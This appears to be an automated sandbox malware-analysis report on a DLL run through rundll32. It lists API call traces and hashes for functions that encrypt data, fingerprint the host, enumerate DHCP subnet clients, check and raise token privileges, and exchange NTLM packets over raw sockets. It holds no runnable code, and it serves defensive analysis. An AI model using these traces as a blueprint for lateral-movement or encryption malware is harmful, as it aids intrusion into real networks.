                                                                      Function 048515A7 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000010,76ED5E70,?,74DEF380), ref: 048515D9
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048515E2
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04851603
                                                                      • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04851633
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04851636
                                                                      • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 0485166E
                                                                      • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04851688
                                                                      • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 0485169C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 048516AD
                                                                      • HeapFree.KERNEL32(00000000), ref: 048516B4
                                                                      • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 048516CA
                                                                      • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 048516E8
                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04851701
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0485171A
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 04851728
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04851737
                                                                      Strings
                                                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 048515F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                                                      • API String ID: 2620112963-1948191093
                                                                      • Opcode ID: 4732198a9ac9ee7f8be27dd699687f775013653271473afd99e7964ef7a18029
                                                                      • Instruction ID: d3e9f6ed762b9ff6057b94dbd22e5923b32e73026c58665eaebd96cbfd296797
                                                                      • Opcode Fuzzy Hash: 4732198a9ac9ee7f8be27dd699687f775013653271473afd99e7964ef7a18029
                                                                      • Instruction Fuzzy Hash: BA516C71A00219BBEF119FA5DC48B9FBFB9FF08750F008954F911EA0A0DB749A01DB60
                                                                      Function 048557E5 Relevance: 18.2, APIs: 12, Instructions: 160memorytimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04855805
                                                                      • GetSystemDefaultLCID.KERNEL32 ref: 0485581D
                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 0485582D
                                                                      • memcpy.MSVCRT(0000000C,?,00000021,?), ref: 0485584B
                                                                      • NetWkstaGetInfo.NETAPI32(04860494,00000064,?), ref: 04855861
                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?), ref: 048558C7
                                                                      • memcpy.MSVCRT(0000002D,?,00000000,?,?,?), ref: 048558EA
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 048558F3
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04855924
                                                                      • memcpy.MSVCRT(00000005,?,?,?,?,?), ref: 04855943
                                                                      • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 0485598C
                                                                      • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 048559A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                      • String ID:
                                                                      • API String ID: 2529142246-0
                                                                      • Opcode ID: 2c9f744ca6e5f473892b2eced10d48cd1bc93d2e212bfcb923139269cc132bfa
                                                                      • Instruction ID: e85870a0c5fa0995b101e2a7b309b03b17dc5fee559b1c21d459fc9ca71f9732
                                                                      • Opcode Fuzzy Hash: 2c9f744ca6e5f473892b2eced10d48cd1bc93d2e212bfcb923139269cc132bfa
                                                                      • Instruction Fuzzy Hash: B251B171900306EFDB219FA8C884EAABBB9FF44314F048E55ED55DB255E778EA00CB51
                                                                      Function 04858D39 Relevance: 16.6, APIs: 11, Instructions: 130memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,6F994950,00000000), ref: 04858D80
                                                                      • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04858DA2
                                                                      • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04858DCE
                                                                      • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04858E07
                                                                      • htonl.WS2_32(00000000), ref: 04858E36
                                                                      • htonl.WS2_32(00000000), ref: 04858E44
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858E47
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858E65
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858E6C
                                                                      • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04858E81
                                                                      • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04858E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 4121633671-0
                                                                      • Opcode ID: 176ff8767f1275bd384710618a8e3b386dd17e58f9bbb4829a14732e102844a2
                                                                      • Instruction ID: 63fee3c8f7502dfc896b7e3e62a04fef7be92ea9750b52da8e6962315d3d2ec5
                                                                      • Opcode Fuzzy Hash: 176ff8767f1275bd384710618a8e3b386dd17e58f9bbb4829a14732e102844a2
                                                                      • Instruction Fuzzy Hash: 5F41C5B1D00219AFDB11EFE9D8849DEFBFCFB48340B108956E905E7220D774AA458B60
                                                                      Function 0485841D Relevance: 16.6, APIs: 11, Instructions: 78memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?,04858555,?,?), ref: 04858430
                                                                      • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04858555,?,?), ref: 0485844C
                                                                      • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04858555,?,?), ref: 04858464
                                                                      • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04858555,?,?), ref: 0485847D
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 048584A3
                                                                      • CheckTokenMembership.ADVAPI32(?,?,?), ref: 048584BA
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 048584CB
                                                                      • FreeSid.ADVAPI32(?), ref: 048584D4
                                                                      • CloseHandle.KERNEL32(?), ref: 048584DD
                                                                      • CloseHandle.KERNEL32(?,?,?,?,04858555,?,?), ref: 048584E2
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,04858555,?,?), ref: 048584E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                      • String ID:
                                                                      • API String ID: 2191316301-0
                                                                      • Opcode ID: cda927eef941170295e07d228f170750a70dde7f1f21e87d0b97634e5a242e5b
                                                                      • Instruction ID: 7acff979969d5fef1b62763ea79e016aeea2fde64e7a7e6d643384407a325715
                                                                      • Opcode Fuzzy Hash: cda927eef941170295e07d228f170750a70dde7f1f21e87d0b97634e5a242e5b
                                                                      • Instruction Fuzzy Hash: D7212F71900208BFDB10BFA0EC88AAE7BBCEF04741F048566FD01E1060D7389E51DB61
                                                                      Function 04857CC5 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,048579E8), ref: 04857CE9
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,048579E8), ref: 04857CF0
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04857D02
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04857D25
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 04857D2D
                                                                      • SetLastError.KERNEL32(?,?,00000000,?,?,?,048579E8), ref: 04857D3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                      • String ID:
                                                                      • API String ID: 2365211911-0
                                                                      • Opcode ID: 257ab18a1c72a5d45ea30631672d02d49f987ee6503651503012393f567dc78e
                                                                      • Instruction ID: 9061c14db1c47f0250023048aa395fbc6b1ff0b182b84d401797d40a4822eb3b
                                                                      • Opcode Fuzzy Hash: 257ab18a1c72a5d45ea30631672d02d49f987ee6503651503012393f567dc78e
                                                                      • Instruction Fuzzy Hash: 33111E75901218BFEB00AFE5EC489EFBFBCEB08750F108825EA05E2150D7789A45CBE1
                                                                      Function 0485559B Relevance: 9.1, APIs: 6, Instructions: 54encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 048555BC
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 048555CB
                                                                      • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 048555DA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 048555EE
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04855601
                                                                      • LocalFree.KERNEL32(?), ref: 04855606
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptParam$Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 3966954206-0
                                                                      • Opcode ID: 0117ff27e28dc3a206c36ad49c9058a6cf2a7a79f10ddc1ba8c8dbb20f2c32a9
                                                                      • Instruction ID: 884cf5703ccf06d59876d339ec3405d084732a0d9ace03882a15339712ac3d3e
                                                                      • Opcode Fuzzy Hash: 0117ff27e28dc3a206c36ad49c9058a6cf2a7a79f10ddc1ba8c8dbb20f2c32a9
                                                                      • Instruction Fuzzy Hash: 7601E9B6900258BFEB11AF95DC84DAFBFBCEB44390F008866FA05A2150D6745A51DA60
                                                                      Function 048556D8 Relevance: 7.6, APIs: 5, Instructions: 72encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04855714
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 0485571F
                                                                      • memcpy.MSVCRT(00000000,?,000000F0,?,?,?), ref: 04855736
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04855750
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0485576E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 55365748-0
                                                                      • Opcode ID: 5aff170b6b8301fb72d19ae0ef8cb12924284d5269695983f7e4a0b0af88d2d9
                                                                      • Instruction ID: 2f41ded699485109f9459ce2c868b4b305a3880ed4e7115f017797dd47a10a3a
                                                                      • Opcode Fuzzy Hash: 5aff170b6b8301fb72d19ae0ef8cb12924284d5269695983f7e4a0b0af88d2d9
                                                                      • Instruction Fuzzy Hash: F5218E75900215FFCB219FA4DC84E9EBFA8EB08750F104555F904E3254D7719A00CBA0
                                                                      Function 04855780 Relevance: 6.0, APIs: 4, Instructions: 47encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 0485579E
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,?,04855988,00000000,?,?,?,?,?,?,?,?), ref: 048557AD
                                                                      • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 048557C6
                                                                      • LocalFree.KERNEL32(00000000,?,04855988,00000000,?,?,?,?,?,?,?,?), ref: 048557D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 4291131564-0
                                                                      • Opcode ID: 7c6118e2127e699db00e33dced2a72c9950b46cc148f36b9029e4b893f3671a3
                                                                      • Instruction ID: 96e21462a4593cd78f8356ed6b4dec50f7de2aa29fca5dcf97aef4f37b13a745
                                                                      • Opcode Fuzzy Hash: 7c6118e2127e699db00e33dced2a72c9950b46cc148f36b9029e4b893f3671a3
                                                                      • Instruction Fuzzy Hash: DB014B7620020DFFEB019E98DC80EAE7BADEB44754F108466BE00D7214EBB5DE019B60
                                                                      Function 04856246 Relevance: 4.5, APIs: 3, Instructions: 39encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856260
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,048562E9,?,?,?,?), ref: 04856273
                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856289
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$CreateDataParam
                                                                      • String ID:
                                                                      • API String ID: 3669532303-0
                                                                      • Opcode ID: d44bf9d8e67cd2397e7736318084c1b8ee9e46f8cfe1b0c6f644987901c386bb
                                                                      • Instruction ID: caf673d7beb2d16e51f43746f9f5b206020ef9c3fffe6dbb53cf6c3ec13e04e3
                                                                      • Opcode Fuzzy Hash: d44bf9d8e67cd2397e7736318084c1b8ee9e46f8cfe1b0c6f644987901c386bb
                                                                      • Instruction Fuzzy Hash: C7F0BDB5200308FFE7119FA5ED85E6B77FDFB44744B508829F606E6150D775AD448B20
                                                                      Function 04851747 Relevance: 70.4, APIs: 38, Strings: 2, Instructions: 424memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04851C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04851783
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485178C
                                                                      • CharUpperW.USER32(00000000), ref: 048517B2
                                                                      • GetProcessHeap.KERNEL32(00000008,00000086), ref: 048517DA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048517DD
                                                                      • htons.WS2_32(00000082), ref: 04851801
                                                                      • send.WS2_32(00000086,?,00000086,00000041), ref: 04851863
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 0485187F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000018), ref: 048518F4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048518FD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04851958
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485195B
                                                                      • rand.MSVCRT ref: 04851983
                                                                      • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 048519B8
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048519BB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851A13
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04851A16
                                                                      • htons.WS2_32(-000000FC), ref: 04851A39
                                                                      • memcpy.MSVCRT(00000087,?,?), ref: 04851B48
                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 04851B7A
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04851B93
                                                                      • memset.MSVCRT ref: 04851BAB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851BB6
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BBD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851BC8
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BCF
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851BE3
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BE6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04851BF1
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BF4
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851BFF
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C02
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04851C0D
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C10
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851C19
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C1C
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851C27
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C2A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                                                      • String ID: NTLM$SSP
                                                                      • API String ID: 2370844593-3976291102
                                                                      • Opcode ID: 17f0d037e789fa4dc0ddb4aabbe26d35a9d8a0bcbfe4a9067d0bb0e360d0dbc8
                                                                      • Instruction ID: 63024ccbc3ecf13f69a3368e741de3f307a286cab2c37a27d629d8d313b2cfd5
                                                                      • Opcode Fuzzy Hash: 17f0d037e789fa4dc0ddb4aabbe26d35a9d8a0bcbfe4a9067d0bb0e360d0dbc8
                                                                      • Instruction Fuzzy Hash: 69F1C071900306AFDB10DFA8C889BAA7BF4FF48300F048959ED45DB2A1EB79E845CB55
                                                                      Function 048529A2 Relevance: 57.4, APIs: 38, Instructions: 367memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74DEF380,?,04854775), ref: 048529BF
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 048529C8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001124,?,04854775), ref: 048529DC
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 048529DF
                                                                      • rand.MSVCRT ref: 048529F0
                                                                      • htons.WS2_32(00000050), ref: 04852A25
                                                                      • rand.MSVCRT ref: 04852A7E
                                                                      • rand.MSVCRT ref: 04852A96
                                                                      • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04852ABB
                                                                      • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04852AD2
                                                                      • rand.MSVCRT ref: 04852AE7
                                                                      • htons.WS2_32(00001120), ref: 04852B06
                                                                      • GetProcessHeap.KERNEL32(00000008,00000160,?,04854775), ref: 04852B6A
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852B71
                                                                      • htons.WS2_32(0000015C), ref: 04852B90
                                                                      • rand.MSVCRT ref: 04852BBE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,?,04854775), ref: 04852BD2
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852BD9
                                                                      • htons.WS2_32(00000044), ref: 04852BF8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001638,?,04854775), ref: 04852C58
                                                                      • HeapAlloc.KERNEL32(00000000,?,04854775), ref: 04852C5F
                                                                      • memcpy.MSVCRT(00000000,00000000,00001124,?,04854775), ref: 04852C79
                                                                      • memcpy.MSVCRT(00001124,?,00000160,?,?,?,?,04854775), ref: 04852C90
                                                                      • htons.WS2_32(00000050), ref: 04852C9A
                                                                      • memcpy.MSVCRT(000012D8,?,00000048,?,?,?,?,?,?,?,04854775), ref: 04852D17
                                                                      • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04852D37
                                                                      • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04852D4F
                                                                      • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04852D86
                                                                      • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04854775), ref: 04852DB3
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04854775), ref: 04852DBA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DC6
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DCD
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DD9
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DE0
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,04854775), ref: 04852DE9
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852DF0
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,04854775), ref: 04852DFB
                                                                      • HeapFree.KERNEL32(00000000,?,04854775), ref: 04852E02
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                      • String ID:
                                                                      • API String ID: 2063504749-0
